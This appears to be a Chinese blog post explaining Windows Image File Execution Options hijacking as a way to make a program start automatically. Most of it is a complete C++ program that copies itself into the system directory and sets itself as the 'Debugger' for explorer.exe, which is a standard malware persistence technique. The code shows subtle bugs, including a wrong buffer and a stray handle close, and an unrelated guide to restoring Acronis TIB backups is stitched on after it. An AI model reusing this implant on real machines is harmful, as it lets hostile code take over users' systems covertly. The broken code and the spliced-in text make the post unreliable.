安全之路 —— 通过映像劫持实现文件自启动

简介

Windows映像劫持技术是微软提供给软件开发者调试使用的在注册表项,能够替换目标进程执行。但如果被病毒木马利用,便会成为触发式自启动的绝佳方式,所以修改映像劫持的操作行为也被反病毒软件列为极其危险的行为之一。

  • 实现映像劫持修改的注册表项为:
  1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options

在项下添加新的子键,名为替代启动的目标进程名,例如“cmd.exe”,然后创建新的值项为“Debugger”,值为新的进程路径。

C++代码样例

////////////////////////////////////////////////
//
// FileName : ifeoDemo.cpp
// Creator : PeterZ1997
// Date : 2018-5-5 18:44
// Comment : Image File Hijacking Demo
//
////////////////////////////////////////////////

#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <iostream>
#include <windows.h>

using namespace std;

const unsigned int MAX_COUNT = 255;
BOOL g_fileExistFlag = false;

/**
 * @brief 封装字符型注册表操作
 * @param hRoot root key
 * @param szSubKey sub key after the root key
 * @param szValueName key name
 * @param szData key Data
 * @return Boollean Value
 */
BOOL setStringValueToReg(HKEY hRoot, const char* szSubKey, const char* szValueName, const char* szValue)
{
    HKEY hKey;
    long lRet;
    if (lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL)) return false;
    if (lRet = RegSetValueEx(hKey, szValueName, 0, REG_SZ, (BYTE*)szValue, strlen(szValue))) return false;
    RegCloseKey(hKey);
    RegCloseKey(hRoot);
    return true;
}

/**
 * @brief Main Function
 */
int APIENTRY WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
    CHAR szSystemFilePath[MAX_COUNT] = "\0";
    CHAR szSelfFilePath[MAX_COUNT] = "\0";
    CHAR szExplorerPath[MAX_COUNT] = "\0";
    GetSystemDirectory(szSelfFilePath, sizeof(szSystemFilePath));
    strcat_s(szExplorerPath, sizeof(szExplorerPath), "C:\\Windows\\explorer.exe");
    strcat_s(szSystemFilePath, sizeof(szSystemFilePath), "\\sysWork.exe");
    GetModuleFileName(NULL, szSelfFilePath, sizeof(szSelfFilePath));
    if (!CopyFile(szSelfFilePath, szSystemFilePath, true))
    {
        setStringValueToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", "Debugger", "");
        WinExec(szExplorerPath, SW_SHOW);
    }
    setStringValueToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", "Debugger", szSystemFilePath);
    MessageBox(NULL, "HelloWorld", "Tips", MB_OK);
    ExitProcess(0);
    return 0;
}
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
U盘启动PE可以用来启动计算机,以便进行系统维护和恢复操作。TIB映像文件是由Acronis True Image创建的系统备份文件,它包含了整个系统的完整镜像。下面是使用U盘启动PE还原TIB映像文件的步骤: 1.准备一个空的U盘,确保其容量足够存储TIB映像文件和PE工具。 2.下载一个适合的PE启动工具,例如EasyUEFI或Rufus等,将其安装在本地计算机上。 3.用选定的PE启动工具创建一个可启动的U盘。这个步骤可能会涉及选择一个PE映像文件(ISO文件)和指定U盘的分区格式。 4.将TIB映像文件复制到U盘的根目录下。确保复制过程顺利完成。 5.将U盘插入需要还原的计算机的USB接口中。 6.将需要还原的计算机重启,并进入BIOS设置界面。 7.在BIOS设置界面中,将U盘设置为首选启动设备。保存设置并退出。 8.计算机重新启动后,系统将从U盘中的PE工具启动。 9.在PE环境中,找到并打开Acronis True Image软件。 10.在Acronis True Image界面中,选择“还原”功能,并浏览到U盘的根目录找到需要还原的TIB映像文件。 11.选择恢复选项,如目标磁盘、目标分区等。 12.点击“开始”按钮开始还原操作。请谨慎选择还原目标,以免损坏数据。 13.等待还原过程完成,这可能需要一段时间,取决于TIB映像文件的大小和计算机性能。 14.还原完成后,从U盘中拔出U盘,并重启计算机。 15.计算机重新启动后,将进入恢复后的系统。 这是使用U盘启动PE还原TIB映像文件的步骤。请注意,操作系统、PE工具和Acronis True Image软件的版本可能会有所不同,具体步骤可能会略有差异。在操作过程中,请确保备份重要数据,并小心操作,以免造成数据丢失或系统损坏。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值